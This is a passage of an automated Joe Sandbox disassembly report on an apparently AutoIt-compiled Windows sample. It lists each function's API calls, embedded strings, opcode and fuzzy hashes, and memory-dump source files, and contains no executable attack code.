                                                                    • Part of subcall function 0097A8CA: SetTextColor.GDI32(?,?), ref: 0097A907
                                                                    • Part of subcall function 0097A8CA: GetSysColorBrush.USER32(0000000F), ref: 0097A91D
                                                                    • Part of subcall function 0097A8CA: GetSysColor.USER32(0000000F), ref: 0097A928
                                                                    • Part of subcall function 0097A8CA: GetSysColor.USER32(00000011), ref: 0097A945
                                                                    • Part of subcall function 0097A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0097A953
                                                                    • Part of subcall function 0097A8CA: SelectObject.GDI32(?,00000000), ref: 0097A964
                                                                    • Part of subcall function 0097A8CA: SetBkColor.GDI32(?,00000000), ref: 0097A96D
                                                                    • Part of subcall function 0097A8CA: SelectObject.GDI32(?,?), ref: 0097A97A
                                                                    • Part of subcall function 0097A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0097A999
                                                                    • Part of subcall function 0097A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0097A9B0
                                                                    • Part of subcall function 0097A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0097A9C5
                                                                    • Part of subcall function 0097A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097A9ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  • Opcode ID: 6f3492c7f9587d1155718fb111ff1f55eb93ea5550c986f27508cb5fda62bf39
                                                                  • Instruction ID: dea9642f95ee66712e0917fec345b256a1dfad803d21915f1e1d84d92a7f2e28
                                                                  • Opcode Fuzzy Hash: 6f3492c7f9587d1155718fb111ff1f55eb93ea5550c986f27508cb5fda62bf39
                                                                  • Instruction Fuzzy Hash: B1917B7351C301EFCB109F64DC08A6F7BA9FF89321F104A29F96AA61A0D771D984DB52
                                                                  Function 008F2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?), ref: 008F2CA2
                                                                  • DeleteObject.GDI32(00000000), ref: 008F2CE8
                                                                  • DeleteObject.GDI32(00000000), ref: 008F2CF3
                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 008F2CFE
                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 008F2D09
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0092C43B
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0092C474
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0092C89D
                                                                    • Part of subcall function 008F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F2036,?,00000000,?,?,?,?,008F16CB,00000000,?), ref: 008F1B9A
                                                                  • SendMessageW.USER32(?,00001053), ref: 0092C8DA
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0092C8F1
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0092C907
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0092C912
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                  • String ID: 0
                                                                  • API String ID: 464785882-4108050209
                                                                  • Opcode ID: eca00998de809d0513379d344a73e2c34b0a07151ff1dc063a715257489e1a2f
                                                                  • Instruction ID: adce11b5ab8f8a5d86915e311404c0bf83eba370dc731552fd7414d6803f1f36
                                                                  • Opcode Fuzzy Hash: eca00998de809d0513379d344a73e2c34b0a07151ff1dc063a715257489e1a2f
                                                                  • Instruction Fuzzy Hash: 8D129B70204216AFDB20CF24D894BBDBBA9FF44304F548569F989DB266C731E882DF91
                                                                  Function 009674AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 009674DE
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096759D
                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009675DB
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009675ED
                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00967633
                                                                  • GetClientRect.USER32(00000000,?), ref: 0096763F
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00967683
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00967692
                                                                  • GetStockObject.GDI32(00000011), ref: 009676A2
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009676A6
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009676B6
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009676BF
                                                                  • DeleteDC.GDI32(00000000), ref: 009676C8
                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009676F4
                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 0096770B
                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00967746
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0096775A
                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 0096776B
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0096779B
                                                                  • GetStockObject.GDI32(00000011), ref: 009677A6
                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009677B1
                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009677BB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: decf318045f6001772f5d97468999bb20692d06a149375da5c3805d4aef7a40f
                                                                  • Instruction ID: 4f6a397cc1cb3f4902b828d953963748855c2a735e29aaf070968370070c641a
                                                                  • Opcode Fuzzy Hash: decf318045f6001772f5d97468999bb20692d06a149375da5c3805d4aef7a40f
                                                                  • Instruction Fuzzy Hash: 1EA17171A14619BFEB14DBA8DD4AFAEBB79EB04714F004214FA19E72E0C770AD40DB60
                                                                  Function 0095AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095AD1E
                                                                  • GetDriveTypeW.KERNEL32(?,0097FAC0,?,\\.\,0097F910), ref: 0095ADFB
                                                                  • SetErrorMode.KERNEL32(00000000,0097FAC0,?,\\.\,0097F910), ref: 0095AF59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: a82166d5a39cae8730730fbc75fd5ee0cc94d56de467b8f458e7548c8d90af83
                                                                  • Instruction ID: 9da85f1d1b69866a48ae5ab6056d8bccccd6e0f3408dcd058c15b0d4f2e1b327
                                                                  • Opcode Fuzzy Hash: a82166d5a39cae8730730fbc75fd5ee0cc94d56de467b8f458e7548c8d90af83
                                                                  • Instruction Fuzzy Hash: AE51D9B06481099B8B00EB26CD52D7E73B4FF897067604656FC07E7190DA349D09DBA7
                                                                  Function 008F68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  • Opcode ID: 59c8f9f2e06c2ba6728f6d36b4f119c2a2ab27d31416c1ba3be09c2d8445b1e3
                                                                  • Instruction ID: 858c599ee43563c087bc631728038c9f021590c2426e3fba58ef4be4870c4ec0
                                                                  • Opcode Fuzzy Hash: 59c8f9f2e06c2ba6728f6d36b4f119c2a2ab27d31416c1ba3be09c2d8445b1e3
                                                                  • Instruction Fuzzy Hash: 2281067170021E6ADB10AB74EC82FBA3768FF55714F044125FA05EA1D6FBA0DE61D2A1
                                                                  Function 00979A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00979AD2
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00979B8B
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00979BA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  • Opcode ID: 89dece91c7f7a48639849785ac066cf3f73f7d7afde3ae52f63faf51a368775a
                                                                  • Instruction ID: 3b12530c41a42c671b815739f85e9484f9e3ae15899d8ebed042090a955f03e8
                                                                  • Opcode Fuzzy Hash: 89dece91c7f7a48639849785ac066cf3f73f7d7afde3ae52f63faf51a368775a
                                                                  • Instruction Fuzzy Hash: FC02CF72108301AFDB25CF24C859BAABBE9FF89314F04892DF99DD62A1C734D844DB52
                                                                  Function 0097A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 0097A903
                                                                  • SetTextColor.GDI32(?,?), ref: 0097A907
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0097A91D
                                                                  • GetSysColor.USER32(0000000F), ref: 0097A928
                                                                  • CreateSolidBrush.GDI32(?), ref: 0097A92D
                                                                  • GetSysColor.USER32(00000011), ref: 0097A945
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0097A953
                                                                  • SelectObject.GDI32(?,00000000), ref: 0097A964
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0097A96D
                                                                  • SelectObject.GDI32(?,?), ref: 0097A97A
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0097A999
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0097A9B0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0097A9C5
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097A9ED
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0097AA14
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0097AA32
                                                                  • DrawFocusRect.USER32(?,?), ref: 0097AA3D
                                                                  • GetSysColor.USER32(00000011), ref: 0097AA4B
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0097AA53
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0097AA67
                                                                  • SelectObject.GDI32(?,0097A5FA), ref: 0097AA7E
                                                                  • DeleteObject.GDI32(?), ref: 0097AA89
                                                                  • SelectObject.GDI32(?,?), ref: 0097AA8F
                                                                  • DeleteObject.GDI32(?), ref: 0097AA94
                                                                  • SetTextColor.GDI32(?,?), ref: 0097AA9A
                                                                  • SetBkColor.GDI32(?,?), ref: 0097AAA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 05e8ef7c45157c0c92cc211d209575659fc46df42cb0808b6963047087a0153f
                                                                  • Instruction ID: b9b1847ca04021583ec65a9544b06fbd1dfac9c7b706a03bbb55ec650f94c4a4
                                                                  • Opcode Fuzzy Hash: 05e8ef7c45157c0c92cc211d209575659fc46df42cb0808b6963047087a0153f
                                                                  • Instruction Fuzzy Hash: 9A512C72914208EFDF109FA4DC48EAE7B79FF48320F118525F919BB2A1D6759980DB50
                                                                  Function 009789D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00978AC1
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00978AD2
                                                                  • CharNextW.USER32(0000014E), ref: 00978B01
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00978B42
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00978B58
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00978B69
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00978B86
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00978BD8
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00978BEE
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00978C1F
                                                                  • _memset.LIBCMT ref: 00978C44
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00978C8D
                                                                  • _memset.LIBCMT ref: 00978CEC
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00978D16
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00978D6E
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00978E1B
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00978E3D
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00978E87
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00978EB4
                                                                  • DrawMenuBar.USER32(?), ref: 00978EC3
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00978EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: c60b2ec82026cc971b46df04e3fabe437cb5d8f5ae99d7b1a2be1a023a909dfe
                                                                  • Instruction ID: ab27afe60d9ffe5ae8977deb65d444944d46a34143da9d2e8a9ba8fb1a164fae
                                                                  • Opcode Fuzzy Hash: c60b2ec82026cc971b46df04e3fabe437cb5d8f5ae99d7b1a2be1a023a909dfe
                                                                  • Instruction Fuzzy Hash: C9E16E72944218AFDB219F60CC88EEF7BB9FF49720F108156F91DAA190DB748980DF60
                                                                  Function 0097488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 009749CA
                                                                  • GetDesktopWindow.USER32 ref: 009749DF
                                                                  • GetWindowRect.USER32(00000000), ref: 009749E6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00974A48
                                                                  • DestroyWindow.USER32(?), ref: 00974A74
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00974A9D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00974ABB
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00974AE1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00974AF6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00974B09
                                                                  • IsWindowVisible.USER32(?), ref: 00974B29
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00974B44
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00974B58
                                                                  • GetWindowRect.USER32(?,?), ref: 00974B70
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00974B96
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00974BB0
                                                                  • CopyRect.USER32(?,?), ref: 00974BC7
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00974C32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: 0574aa510f4af71d79693ac76ca91a117a239278486f974f4b9b47b86722447c
                                                                  • Instruction ID: 38a451cd65c08e586c0054fe81f73cbf214fcabcb22b715d45bbf698a50ee7d3
                                                                  • Opcode Fuzzy Hash: 0574aa510f4af71d79693ac76ca91a117a239278486f974f4b9b47b86722447c
                                                                  • Instruction Fuzzy Hash: 44B15A72608350AFDB04DF68C848B6ABBE4FB84714F008918F59DAB2A2D771EC45CB56
                                                                  Function 0095449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009544AC
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009544D2
                                                                  • _wcscpy.LIBCMT ref: 00954500
                                                                  • _wcscmp.LIBCMT ref: 0095450B
                                                                  • _wcscat.LIBCMT ref: 00954521
                                                                  • _wcsstr.LIBCMT ref: 0095452C
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00954548
                                                                  • _wcscat.LIBCMT ref: 00954591
                                                                  • _wcscat.LIBCMT ref: 00954598
                                                                  • _wcsncpy.LIBCMT ref: 009545C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: cba1e78b0c1228377a91d4bc06ac1978b0ba3151ceb91a5594346d27b18137a4
                                                                  • Instruction ID: 3cc4bf488158c2b7c4d42903bb69e40c66db7ee182ceae1d3d17b768102508fc
                                                                  • Opcode Fuzzy Hash: cba1e78b0c1228377a91d4bc06ac1978b0ba3151ceb91a5594346d27b18137a4
                                                                  • Instruction Fuzzy Hash: 7041F632A002087AEB14EB75DC07FFF77ACDFC6714F004466F908A6182FA759A9197A5
                                                                  Function 008F27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F28BC
                                                                  • GetSystemMetrics.USER32(00000007), ref: 008F28C4
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F28EF
                                                                  • GetSystemMetrics.USER32(00000008), ref: 008F28F7
                                                                  • GetSystemMetrics.USER32(00000004), ref: 008F291C
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F2939
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F2949
                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F297C
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F2990
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 008F29AE
                                                                  • GetStockObject.GDI32(00000011), ref: 008F29CA
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 008F29D5
                                                                    • Part of subcall function 008F2344: GetCursorPos.USER32(?), ref: 008F2357
                                                                    • Part of subcall function 008F2344: ScreenToClient.USER32(009B57B0,?), ref: 008F2374
                                                                    • Part of subcall function 008F2344: GetAsyncKeyState.USER32(00000001), ref: 008F2399
                                                                    • Part of subcall function 008F2344: GetAsyncKeyState.USER32(00000002), ref: 008F23A7
                                                                  • SetTimer.USER32(00000000,00000000,00000028,008F1256), ref: 008F29FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
